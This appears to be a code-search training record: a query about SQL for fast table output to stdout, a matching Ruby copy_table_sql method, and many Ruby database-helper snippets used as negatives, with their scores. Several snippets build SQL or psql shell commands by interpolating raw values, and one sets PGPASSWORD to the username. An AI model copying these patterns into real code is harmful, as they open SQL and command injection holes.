"def reaktor_insert(row)\n insert_id = 0\n unless row.idstore.nil?\n Log.write_log($import_log, \"reaktor_insert: Table: #{row.table_name} args: #{row.idstore.args * ', '}\")\n else\n Log.write_log($import_log, \"reaktor_insert: Table: #{row.table_name} No IdStore object\")\n end\n query = \"INSERT INTO #{row.table_name} (#{row.get_column_name_string})\\n VALUES (#{(['?']*row.size).join(', ')})\"\n sth = $dbh_ms.prepare(query)\n begin\n sth.execute(*row.get_column_values)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not insert data. Message: #{$!}. query: \\\"#{get_query_string(sth)}\\\"\")\n raise\n exit\n end\n begin\n insert_id = $dbh_ms.func(:insert_id) unless row.idstore.nil?\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not get insert id. Message: #{$!}.\")\n raise\n exit\n end\n if insert_id > 0\n row.store_id(insert_id)\n Log.write_log($import_log, \"Insert id store to table: #{row.table_name} id_store parameters: (#{row.idstore.args * ', '}) id: #{insert_id}\")\n else\n unless row.idstore.nil?\n Log.write_log($import_log, \"No id stored for table: #{row.table_name} id_store parameters: (#{row.idstore.args * ', '})\")\n else\n Log.write_log($import_log, \"No id stored for table: #{row.table_name} No IdStore object\")\n end\n \n end\nend",
"def insert_multi(tablename, arr_hashes, args = {})\n sql = \"INSERT INTO `#{tablename}` (\"\n\n first = true\n if args && args[:keys]\n keys = args[:keys]\n elsif arr_hashes.first.is_a?(Hash)\n keys = arr_hashes.first.keys\n else\n raise \"Could not figure out keys.\"\n end\n\n keys.each do |col_name|\n sql << \",\" unless first\n first = false if first\n sql << quote_column(col_name)\n end\n\n sql << \") VALUES (\"\n\n first = true\n arr_hashes.each do |hash|\n if first\n first = false\n else\n sql << \"),(\"\n end\n\n first_key = true\n if hash.is_a?(Array)\n hash.each do |val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n else\n hash.each do |_key, val|\n if first_key\n first_key = false\n else\n sql << \",\"\n end\n\n sql << @db.quote_value(val)\n end\n end\n end\n\n sql << \")\"\n\n return sql if args && args[:return_sql]\n\n query(sql)\n\n if args && args[:return_id]\n first_id = last_id\n raise \"Invalid ID: #{first_id}\" if first_id.to_i <= 0\n ids = [first_id]\n 1.upto(arr_hashes.length - 1) do |count|\n ids << first_id + count\n end\n\n ids_length = ids.length\n arr_hashes_length = arr_hashes.length\n raise \"Invalid length (#{ids_length}, #{arr_hashes_length}).\" unless ids_length == arr_hashes_length\n\n return ids\n else\n return nil\n end\n end",
"def create_rows_and_query(number_rows, number_query, str_length)\n File.open(\"../benchmark/benchmark_#{number_query}_queries.sql\", 'a+') do |file|\n CSV.open(\"./#{number_rows}_rows_data.csv\", 'a+') do |csv|\n number_rows.times do |time|\n random_str1 = random_str(str_length)\n csv << [time + 1, random_str1]\n file.write(\"select * from test_data where random_str = '#{random_str1}';\") if time < number_query\n end\n end\n end\n puts \"CREATE #{number_rows} ROWS DONE\"\nend",
"def setup ()\n db = HTPH::Hathidb::Db.new();\n @conn = db.get_conn();\n @bench = HTPH::Hathibench::Benchmark.new();\n last_id_sql = \"SELECT LAST_INSERT_ID() AS id\";\n str_exist_sql = \"SELECT id, str FROM hathi_str WHERE str = ?\";\n str_insert_sql = \"INSERT INTO hathi_str (str) VALUES (?)\";\n hathi_gd_insert_sql = \"INSERT INTO hathi_gd (gov_doc, file_id, lineno, mongo_id, hashsum, record_id, item_id) VALUES (?, ?, ?, ?, ?, ?, ?)\";\n input_select_sql = \"SELECT id FROM hathi_input_file WHERE file_path = ?\";\n input_insert_sql = \"INSERT INTO hathi_input_file (file_path, date_read) VALUES (?, SYSDATE())\";\n\n @last_id_q = @conn.prepare(last_id_sql);\n @str_exist_q = @conn.prepare(str_exist_sql);\n @str_insert_q = @conn.prepare(str_insert_sql);\n @hathi_gd_insert_q = @conn.prepare(hathi_gd_insert_sql);\n @input_select_q = @conn.prepare(input_select_sql);\n @input_insert_q = @conn.prepare(input_insert_sql);\n\n @sha_digester = Digest::SHA256.new();\n\n @loadfiles = {}; # Write tab-delim data, and when all is done, load into table.\n %w[isbn issn lccn oclc title enumc pubdate publisher sudoc].each do |suffix|\n @loadfiles[suffix] = HTPH::Hathidata::Data.new(\"#{suffix}.dat\");\n end\n\n @infile_cache = {};\nend",
"def do_bulk_load(file, table_name, options={})\n q = \"COPY #{table_name} \"\n q << \"(#{options[:columns].join(',')}) \" if options[:columns]\n q << \"FROM '#{File.expand_path(file)}' \"\n if options[:fields]\n q << \"WITH \"\n q << \"DELIMITER '#{options[:fields][:delimited_by]}' \" if options[:fields][:delimited_by]\n q << \"NULL '#{options[:fields][:null_string]}'\" if options[:fields][:null_string]\n if options[:fields][:enclosed_by] || options[:ignore] && options[:ignore] > 0\n q << \"CSV \"\n q << \"HEADER \" if options[:ignore] && options[:ignore] > 0\n q << \"QUOTE '#{options[:fields][:enclosed_by]}' \" if options[:fields][:enclosed_by]\n end\n end\n \n execute(q)\n end",
"def run_import(argv = ARGV)\n buffer = []\n CSV.open(IMPORT_PATH, {:headers => true}) do |csv|\n csv.each do |row|\n res = @db.execute \"SELECT * FROM coordinates where lat = #{row[0].to_f} AND lng = #{row[1].to_f}\"\n if res.empty?\n sql = \"(#{row[0].to_f}, #{row[1].to_f}, '#{row[2]}')\"\n buffer << sql\n if buffer.length > 0 && (buffer.length % 500) == 0\n sql = \"INSERT INTO coordinates(lat, lng, neighborhood) VALUES \" + buffer.join(\", \\n\") + \";\"\n @db.execute sql\n print '.'\n buffer = []\n end\n end\n end\n\n if buffer.length > 0\n sql = \"INSERT INTO coordinates(lat, lng, neighborhood) VALUES \" + buffer.join(\", \\n\") + \";\"\n @db.execute sql\n print '.'\n end\n puts\n end\n end",
"def write_nutrient_data_table()\n puts <<SQL\ndrop table if exists NUTRIENT_DATA;\ndrop index if exists food_id_idx;\ndrop index if exists nutrient_id_idx;\n\ncreate table NUTRIENT_DATA(\n food_id char(5) not null,\n nutrient_id char(3) not null,\n nutrient_value float not null,\n data_points float not null,\n std_error float default null,\n source_code varchar(2) not null,\n derivation_code char(4) default null,\n food_id_reference char(5) default null,\n added_nutrient char(1) default null,\n number_studies int default null,\n minimum float default null,\n maximum float default null,\n degrees_freedom int default null,\n lower_error_bound float default null,\n upper_error_bound float default null,\n statistical_comments char(10) default null,\n modification_date char(10) default null,\n confidence_code char(1) default null,\n primary key (food_id, nutrient_id)\n);\ncreate index food_id_idx on NUTRIENT_DATA(food_id);\ncreate index nutrient_id_idx on NUTRIENT_DATA(nutrient_id);\n\nSQL\n\n read_data('NUT_DATA.txt') do |fields|\n puts make_insert_statement('NUTRIENT_DATA', fields,\n 'food_id', 'nutrient_id', 'nutrient_value',\n 'data_points', 'std_error', 'source_code',\n 'derivation_code', 'food_id_reference',\n 'added_nutrient', 'number_studies', 'minimum',\n 'maximum', 'degrees_freedom', 'lower_error_bound',\n 'upper_error_bound', 'statistical_comments',\n 'modification_date', 'confidence_code')\n end\nend",
"def db_insert(visit_id)\n \"INSERT INto image_datasets\n (rmr, series_description, path, timestamp, created_at, updated_at, visit_id, \n glob, rep_time, bold_reps, slices_per_volume, scanned_file, 'dicom_study_uid')\n VALUES ('#{@rmr_number}', '#{@series_description}', '#{@directory}', '#{@timestamp.to_s}', '#{DateTime.now}', \n '#{DateTime.now}', '#{visit_id}', '#{self.glob}', '#{@raw_image_files.first.rep_time}', \n '#{@raw_image_files.first.bold_reps}', '#{@raw_image_files.first.num_slices}', '#{@scanned_file}' )\"\n end",
"def create_table_from_csv(name, csv_path)\r\n # Get headers\r\n csv = CSV.open(csv_path, :headers => true)\r\n first = csv.first\r\n unless first\r\n raise \"File Empty!!!\"\r\n end\r\n \r\n # sanitize\r\n headers = first.headers\r\n headers.each_with_index {|e, index|\r\n if e.nil? or e.empty?\r\n headers[index] = \"column_#{index + 1}\"\r\n end\r\n }\r\n headers.map!{|e| e.downcase.underscore }\r\n \r\n # check if every field name is unique\r\n if headers.count != headers.uniq.count\r\n raise \"Field name must be UNIQUE: \\nPlease check your input headers: [#{headers.join(', ')}]\"\r\n end\r\n\r\n # Create table\r\n create_table_sql = headers.map{|e| e == 'id' ? \"\\\"#{e}\\\" integer\" : \"\\\"#{e}\\\" text\"}.join(\",\")\r\n create_table_sql = \"drop table if exists #{name}; create table #{name}( #{create_table_sql} );\"\r\n query(create_table_sql)\r\n\r\n # Dump data\r\n insert_data_sql = headers.map{|e| \"\\\"#{e}\\\"\"}.join(\",\")\r\n insert_data_sql = \"COPY #{name}( #{insert_data_sql} ) FROM '#{csv_path}' DELIMITER ',' CSV HEADER;\"\r\n\r\n # Change output file permission so that postgres user can read it\r\n begin\r\n FileUtils.chmod 0755, csv_path\r\n rescue Exception => ex\r\n puts \"Error while changing file permission\"\r\n end\r\n\r\n if local?\r\n query(insert_data_sql)\r\n else\r\n puts \"\\nWARNING: pushing data to remote server [#{$options[:host]}].\\nBe sure you have the correct version of `psql` command installed\\n\\n\"\r\n insert_data_sql = \"PGPASSWORD=#{$options[:username]} psql -U #{$options[:username]} -h #{$options[:host]} -p #{$options[:listen]} #{$options[:database]} -c \\\"\\\\#{insert_data_sql}\\\"\"\r\n\r\n `#{insert_data_sql}`\r\n `PGPASSWORD=\"\"`\r\n end\r\nend",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def insert(object, table)\n sql = object.to_sql(table)\n execute(sql)\n end",
"def run_insert\n raise DataFactory::NoInsertStatement unless @insert_statement\n\n stmt = db_interface.execute_sql(@insert_statement, *@binds)\n stmt.close\n end",
"def addSQL(statement)\n \n if (@count % 250000 == 0)\n @filecount += 1\n self.clearSQL(@filecount)\n puts \"Now writing to insert-#{@filecount}.sql\"\n end\n\n File.open(\"data/insert-#{@filecount}.sql\", 'a') do |file|\n file.puts(statement)\n @count += 1\n end\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def process\n create, insert, table = extract_sql #Extract mysql create/insert statements from the dump file\n raise \"Couldn't extract create syntax from MySql Dump File\" if create.nil?\n create = escape_create_string(create)\n begin\n @connection.execute(\"DROP TABLE #{table}\") rescue ''#Drop existing table first\n @connection.execute(create) #Recreate the table \n if insert && @import_data\n values = row_values(insert) \n values.each do |val|\n sql = \"INSERT INTO #{table} VALUES #{val}\"\n begin\n @connection.execute(sql) #Insert rows\n rescue Exception => e\n puts e.message\n puts sql\n puts \"table #{table}\"\n end\n end\n else\n puts \"There's no records to be added\" if @import_data && !insert\n end\n rescue Exception => e\n puts e.message\n puts \"table #{table}\"\n end\n end",
"def initialize(fname=\"\", lname=\"\", email=\"\")\n @fname = fname\n @lname = lname\n @email = email\n\n puts `psql -d wdi-november -c \"INSERT INTO users (fname, lname, email) VALUES ('#{fname}','#{lname}', '#{email}')\"`\nend",
"def direct_import_from_csv(dataset, opts = {:to => nil, :delimiter => nil, :header => nil})\n delimiter = opts[:delimiter] || \",\"\n header = \"HEADER\" if opts[:header] == true\n table = opts[:to].table_name\n raise TypeError if dataset.class != String\n ActiveRecord::Base.connection.execute(\"COPY #{table} FROM '#{dataset}' DELIMITER \\'#{delimiter}\\' CSV #{header}\")\n end",
"def insert_rows(rows, field, table_struct, dest_table_name = NEW_TABLE_NAME)\n fields = get_fields(table_struct)\n insert_tmplt = row_sql_insert(dest_table_name, table_struct)\n primary_keys = get_pkey_fields(table_struct) \n errs = []\n row_action_data = []\n del_keys = []\n \n if (rows) then\n rows.each_hash do | row |\n row_action_data << {\n :sql_insert => make_sql_insert_row(fields, insert_tmplt, row), \n :key => make_key_hash_for_row(primary_keys, row)\n }\n end\n end\n\n row_action_data.each { |row|\n begin\n dbres = do_sql_command(row[:sql_insert])\n if dbres.nil?\n del_keys << row[:key]\n end\n rescue Mysql::Error\n if !($! =~ /^Duplicate entry .* for key/).nil?\n # i'll consider a duplicate entry okay for a delete\n LOGGER.warn \"Database error! Duplicate key found on insert, marking for deletion anyway, moving on: #{$!}\"\n del_keys << row[:key]\n else\n #errs << \"Database error, moving on: #{$!}\"\n LOGGER.error \"Database error, not sure what, moving on: #{$!}\"\n end\n end\n }\n\n del_keys\nend",
"def table_insert_query(table, values)\n query = \"insert into #{quote_table_name(table)}\"\n query << '(' << values.keys.map do |column_name|\n quote_column_name(column_name)\n end.join(', ') << ') '\n query << 'values(' << values.map do |column_name, value|\n quote_value(table, column_name, value)\n end.join(', ') << ')'\n query\n end",
"def write_food_description_table()\n puts <<SQL\ndrop table if exists FOOD_DESCRIPTION;\ncreate table FOOD_DESCRIPTION(\n id char(5) not null,\n food_group_id char(4) not null,\n description varchar(200) not null,\n short_description varchar(60) not null,\n common_name varchar(100) default null,\n manufacturer_name varchar(65) default null,\n survey_code char(1) default null,\n refuse_description varchar(135) default null,\n refuse_percentage int default null,\n scientific_name varchar(65) default null,\n nitrogen_factor float default null,\n protein_factor float default null,\n fat_factor float default null,\n carbohydrate_factor float default null,\n primary key (id)\n);\nSQL\n\n read_data('FOOD_DES.txt') do |fields|\n puts make_insert_statement('FOOD_DESCRIPTION', fields,\n 'id', 'food_group_id', 'description',\n 'short_description', 'common_name',\n 'manufacturer_name', 'survey_code',\n 'refuse_description', 'refuse_percentage',\n 'scientific_name', 'nitrogen_factor',\n 'protein_factor', 'fat_factor',\n 'carbohydrate_factor')\n end\nend",
"def insert_sql(*values)\n if values.empty?\n insert_default_values_sql\n else\n values = values[0] if values.size == 1\n \n # if hash or array with keys we need to transform the values\n if @transform && (values.is_a?(Hash) || (values.is_a?(Array) && values.keys))\n values = transform_save(values)\n end\n from = source_list(@opts[:from])\n\n case values\n when Array\n if values.empty?\n insert_default_values_sql\n else\n \"INSERT INTO #{from} VALUES #{literal(values)}\"\n end\n when Hash\n if values.empty?\n insert_default_values_sql\n else\n fl, vl = [], []\n values.each {|k, v| fl << literal(k.is_a?(String) ? k.to_sym : k); vl << literal(v)}\n \"INSERT INTO #{from} (#{fl.join(COMMA_SEPARATOR)}) VALUES (#{vl.join(COMMA_SEPARATOR)})\"\n end\n when Dataset\n \"INSERT INTO #{from} #{literal(values)}\"\n else\n if values.respond_to?(:values)\n insert_sql(values.values)\n else\n \"INSERT INTO #{from} VALUES (#{literal(values)})\"\n end\n end\n end\n end",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def create_kitten(db, name, age)\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\nend",
"def copy_into(table, opts=OPTS)\n data = opts[:data]\n data = Array(data) if data.is_a?(String)\n\n if block_given? && data\n raise Error, \"Cannot provide both a :data option and a block to copy_into\"\n elsif !block_given? && !data\n raise Error, \"Must provide either a :data option or a block to copy_into\"\n end\n\n synchronize(opts[:server]) do |conn|\n conn.execute(copy_into_sql(table, opts))\n begin\n if block_given?\n while buf = yield\n conn.put_copy_data(buf)\n end\n else\n data.each{|buff| conn.put_copy_data(buff)}\n end\n rescue Exception => e\n conn.put_copy_end(\"ruby exception occurred while copying data into PostgreSQL\")\n ensure\n conn.put_copy_end unless e\n while res = conn.get_result\n raise e if e\n check_database_errors{res.check}\n end\n end\n end \n end",
"def to_script\n s = TRANSACTION_START[db_type].dup\n s << \"\\n\"\n rows.each {|r| s << r.insert_sql(db_type) }\n s << \"#{TRANSACTION_END[db_type]}\\n\"\n s\n end",
"def create_kitten(db, name, age)\r\n db.execute(\"INSERT INTO kittens (name, age) VALUES (?, ?)\", [name, age])\r\nend",
"def insert_sql_each\n return enum_for(__method__) unless block_given?\n each_row do |row|\n yield table_dataset.insert_sql( row )\n end\n end",
"def OLDview_data db, sql, options\n outputfile = options[:output_to]\n formatting = options[:formatting]\n headers = options[:headers]\n #str = db.get_data sql\n rs = db.execute_query sql\n str = rs.content\n columns = rs.columns\n #puts \"SQL: #{sql}.\\nstr: #{str.size}\"\n data = []\n if headers\n data << columns.join(\"\\t\")\n end\n str.each {|line| data << line.join(\"\\t\"); }\n #puts \"Rows: #{data.size}\"\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n headerstr=nil\n if formatting\n headerstr = \"-H\" unless headers\n # sometimes this can be slow, and it can fault on UTF-8 chars\n system(\"cat #{filename} | term-table.rb #{headerstr} | sponge #{filename}\")\n end\n if outputfile\n #puts \"comes here\"\n system(\"cp #{filename} #{outputfile}\")\n filename = outputfile\n end\n system \"wc -l #{filename}\" if $opt_debug\n \n #system \"$EDITOR #{filename}\"\n system \"vim -c ':set nowrap' #{filename}\"\n tmpfile.close\n tmpfile.unlink\nend",
"def visit_Arel_Nodes_InsertStatement o, *a\n [\n \"INSERT INTO #{visit(o.relation).gsub(/\"/, '')}\",\n \"(#{o.columns.map { |x| x.name }.join ', '})\",\n \" VALUES (#{o.values.left.map { |value| value }.join ', '})\"\n ].compact.join ' '\n end",
"def insert_cako\n\t\tsql = \"insert into CacheTako values (?, ?, ?)\"\n\t\treturn sql\n\tend",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def log_line_to_sql_insert(line)\n\n # Define patterns for the various events\n patterns = {\n :kill => /(\\d{2})\\/(\\d{2})\\/(\\d{4}) - (\\d{2}):(\\d{2}):(\\d{2}): \"(.*)<([^>])*><([^>]*)><([^>]*)>\" killed \"(.*)<([^>])*><([^>]*)><([^>]*)>\" with \"([^\"]*)\"(.*)/,\n :round_won => /\\(CT \"(\\d*)\"\\) \\(T \"(\\d*)\"\\)/ # TODO: FIX THIS PATTERN\n }\n # NOTE: There are multiple variants of the :round_won event, including\n # \"Target_Bombed\"\n # \"CTs_Win\"\n # etc.\n\n # Test all patterns\n patterns.each do |event, pattern|\n line.scan(pattern) do |matches|\n puts \"Event {{ #{event} - #{matches} }}\"\n case event\n when :kill\n #return \"select * from kills limit 1\"\n return \"insert into kills (killer, killed, weapon, headshot) \n values('#{matches[6]}', '#{matches[10]}', '#{matches[14]}',\n #{matches[15].empty? ? 0 : 1})\"\n when :round_won\n # update the CT vs T counts (for this game/map?)\n when :suicide\n # decrement players kill count\n end\n end\n end\n\n return nil\n\n end"
] |
[
"0.6569321",
"0.65120876",
"0.6489801",
"0.64708847",
"0.6438791",
"0.63468456",
"0.622612",
"0.6213247",
"0.62104845",
"0.6193804",
"0.61814976",
"0.6177956",
"0.61522686",
"0.6113579",
"0.61133456",
"0.6103705",
"0.6092123",
"0.60913783",
"0.60901535",
"0.60656404",
"0.60505426",
"0.6034191",
"0.60150766",
"0.5999434",
"0.5990562",
"0.5949599",
"0.5920795",
"0.59039795",
"0.5900114",
"0.5894411",
"0.58857065",
"0.58272797",
"0.5824622",
"0.58070993",
"0.58021605",
"0.5789368",
"0.57804894",
"0.57594734",
"0.5750567",
"0.5710083",
"0.5691629",
"0.56773907",
"0.56595385",
"0.5657434",
"0.56342745",
"0.5632593",
"0.5629524",
"0.5622252",
"0.56166524",
"0.56132245",
"0.5602631",
"0.55853045",
"0.55707854",
"0.5565726",
"0.55565006",
"0.55456936",
"0.5533055",
"0.5524716",
"0.5523423",
"0.5506135",
"0.55027884",
"0.549756",
"0.54951274",
"0.5494275",
"0.54794014",
"0.5476214",
"0.54722625",
"0.54722625",
"0.54718786",
"0.5469394",
"0.5460127",
"0.54530615",
"0.54513294",
"0.54513294",
"0.5450057",
"0.5440682",
"0.54174423",
"0.54142153",
"0.5409666",
"0.5399474",
"0.53977245",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53931457",
"0.53847605",
"0.538393",
"0.5379815",
"0.5371533",
"0.5360417",
"0.53559566",
"0.5354844",
"0.5343018",
"0.5339523",
"0.5338919"
] |
0.6786813
|
0
|
SQL for doing fast table output to stdout.
|
def copy_table_sql(table, opts)
if table.is_a?(String)
table
else
if opts[:options] || opts[:format]
options = String.new
options << " ("
options << "FORMAT #{opts[:format]}" if opts[:format]
options << "#{', ' if opts[:format]}#{opts[:options]}" if opts[:options]
options << ')'
end
table = if table.is_a?(::Sequel::Dataset)
"(#{table.sql})"
else
literal(table)
end
"COPY #{table} TO STDOUT#{options}"
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def OLDview_data db, sql, options\n outputfile = options[:output_to]\n formatting = options[:formatting]\n headers = options[:headers]\n #str = db.get_data sql\n rs = db.execute_query sql\n str = rs.content\n columns = rs.columns\n #puts \"SQL: #{sql}.\\nstr: #{str.size}\"\n data = []\n if headers\n data << columns.join(\"\\t\")\n end\n str.each {|line| data << line.join(\"\\t\"); }\n #puts \"Rows: #{data.size}\"\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n headerstr=nil\n if formatting\n headerstr = \"-H\" unless headers\n # sometimes this can be slow, and it can fault on UTF-8 chars\n system(\"cat #{filename} | term-table.rb #{headerstr} | sponge #{filename}\")\n end\n if outputfile\n #puts \"comes here\"\n system(\"cp #{filename} #{outputfile}\")\n filename = outputfile\n end\n system \"wc -l #{filename}\" if $opt_debug\n \n #system \"$EDITOR #{filename}\"\n system \"vim -c ':set nowrap' #{filename}\"\n tmpfile.close\n tmpfile.unlink\nend",
"def dump_table(io, table_obj)\n #Get SQL for creating table and add it to IO.\n sqls = @args[:db].tables.create(table_obj.name, table_obj.data, :return_sql => true)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n \n #Try to find a primary column in the table.\n prim_col = nil\n table_obj.columns do |col|\n if col.primarykey?\n prim_col = col\n break\n end\n end\n \n \n #Set up rows and way to fill rows.\n rows = []\n block_data = proc do |row|\n rows << row\n @rows_count += 1\n \n if rows.length >= 1000\n self.update_status\n self.dump_insert_multi(io, table_obj, rows)\n end\n end\n \n \n #If a primary column is found then use IDQuery. Otherwise use cloned unbuffered query.\n args = {:idquery => prim_col.name.to_sym} if prim_col\n \n \n #Clone the connecting with array-results and execute query.\n @args[:db].clone_conn(:result => \"array\") do |db|\n db.select(table_obj.name, nil, args, &block_data)\n end\n \n \n #Dump the last rows if any.\n self.dump_insert_multi(io, table_obj, rows) if !rows.empty?\n end",
"def print(sql, *args, io: STDOUT, width: :auto)\n if sql.is_a?(Array) && args.empty?\n records = sql\n else\n records = all sql, *args, into: Hash\n end\n\n ::Simple::SQL.table_print(records, width: width, io: io)\n records\n end",
"def ascii_query(sql,*values)\n sth = self.query(sql,*values)\n rows = sth.fetch_all\n col_names = sth.column_names\n sth.finish\n DBI::Utils::TableFormatter.ascii(col_names, rows)\n end",
"def print_table(table)\r\n if table_exists?(table)\r\n names = get_column_names(table)\r\n puts names.join(\"|\")\r\n table_info = @db.execute(\"SELECT * FROM #{table}\")\r\n print_execute(table_info)\r\n end\r\n end",
"def dump_table(io, table_obj)\n create_data = table_obj.data.clone\n create_data.delete(:name)\n create_data[:return_sql] = true\n\n # Get SQL for creating table and add it to IO.\n sqls = @export_db.tables.create(table_obj.name, **create_data)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n\n\n # Try to find a primary column in the table.\n prim_col = nil\n table_obj.columns do |col|\n if col.primarykey?\n prim_col = col\n break\n end\n end\n\n\n debug \"Dumping data for table: #{table_obj.name}\"\n\n # Set up rows and way to fill rows.\n rows = []\n\n\n @db.select(table_obj.name, nil, unbuffered: true) do |row|\n rows << row\n @rows_count += 1\n\n if rows.length >= 1000\n update_status\n dump_insert_multi(io, table_obj, rows)\n end\n end\n\n\n # Dump the last rows if any.\n dump_insert_multi(io, table_obj, rows) unless rows.empty?\n end",
"def writeTable(outf, db)\n fieldNames = db.fields\n rows = db.data\n \n #outf.puts(\"*** Field Names (#{fieldNames.length}) *** \\n\", fieldNames, \"\\n\") # debug\n #outf.puts(\"*** Records *** \\n\", rows) # debug\n outf.puts(rows)\nend",
"def capture_table(table)\n return 'none' if table.size == 1 # the first row is for column titles\n $stdout = StringIO.new # start capturing the output\n print_table(table.map{ |row| row.map(&:to_s) })\n output = $stdout\n $stdout = STDOUT # restore normal output\n return output.string\n end",
"def db_to_stdout(src)\n pool = Connections.init_pool src\n query_stream = QueryStream.new pool\n stdout_writer = STDOUTWriter.new\n\n Pipe.new from: query_stream, to: stdout_writer\n end",
"def sql! sql=nil\n require 'niceql'\n puts Niceql::Prettifier.prettify_sql sql || $last_sql_command\n end",
"def dumpDataTables\n print \" ------ users\" + Array.new(34).join('-') + \" \" + Array.new(21).join('-')\n $conn.exec(\"SELECT * FROM users order by id\") do |result|\n result.each do |row|\n print \"\\n %6d %-33s \" % row.values_at('id', 'email')\n end\n end\n print \"\\n ------ contents\" + Array.new(50).join('-')\n $conn.exec(\"SELECT * FROM contents order by id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('id', 'text')\n end\n end\n print \"\\n ------ user_responses SHARE\" + Array.new(50).join('-')\n $conn.exec(\"select user_id, string_agg(concat(content_id), ',') from user_responses where response = TRUE group by user_id order by user_id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('user_id', 'string_agg')\n end\n end\n print \"\\n ------ user_responses KILL\" + Array.new(50).join('-')\n $conn.exec(\"select user_id, string_agg(concat(content_id), ',') from user_responses where response = FALSE group by user_id order by user_id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('user_id', 'string_agg')\n end\n end\n print \"\\n ------ user_responses IGNORE\" + Array.new(50).join('-')\n $conn.exec(\"select user_id, string_agg(concat(content_id), ',') from user_responses where response ISNULL group by user_id order by user_id\") do |result|\n result.each do |row|\n print \"\\n %6d %s\" % row.values_at('user_id', 'string_agg')\n end\n end\nend",
"def tabulate content, options\n data = []\n content.each {|line| data << line.join(\"\\t\"); }\n puts \"Rows: #{data.size}\" if $opt_verbose\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n #filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n if options[:formatting]\n system(\"term-table.rb < #{filename} | sponge #{filename}\")\n end\n return filename\nend",
"def view_table(db, table)\n db.execute(\"SELECT * FROM #{table}\")\nend",
"def print_query(sql)\n IRB::Pager.pager {\n query(sql) do |l|\n puts l\n end\n }\n end",
"def showTable(db, flag)\n fieldNames = db.fields \n rows = db.data\n \n case(flag)\n when \"f\" then puts(\"*** Field Names #{fieldNames.length} *** \\n\", fieldNames, \"\\n\")\n when \"r\" then puts(\"*** Records *** \\n\", rows)\n when \"p\" then print(\"*** Records *** \\n\", rows) #debug\n end\nend",
"def big_table\n # suppress_output\n # header title: 'Monkey Butt the wide, and annoying', width: 80, align: 'left', rule: false, color: 'blue', bold: false, timestamp: false\n table border: true do\n row color: 'blue' do\n column 'Player', width: 20, align: 'left', color: 'green'\n column 'Overall % correct', width: 30, align: 'left', color: 'green'\n end\n User.all.each do |user|\n row color: 'blue' do\n # binding.pry\n column \"#{user.name}\", width: 20, align: 'left', color: 'green'\n column \"#{user.total_average}%\", width: 20, align: 'left', color: 'green'\n end\n end\n # column 'ADDRESS', width: 30, padding: 5\n # column 'CITY', width: 15\n # end\n # row color: 'green', bold: true do\n # column 'caeser'\n # column '1 Appian Way'\n # column 'Rome'\n # end\n # row do\n # column 'Richard Feynman'\n # column '1 Golden Gate'\n # column 'Quantum Field'\n end\n\n # return capture_output\n end",
"def sql sql\n @master.puts \"#{sql};\"\n end",
"def put_table(table)\n table.each {|row| puts row.join(' ') }\nend",
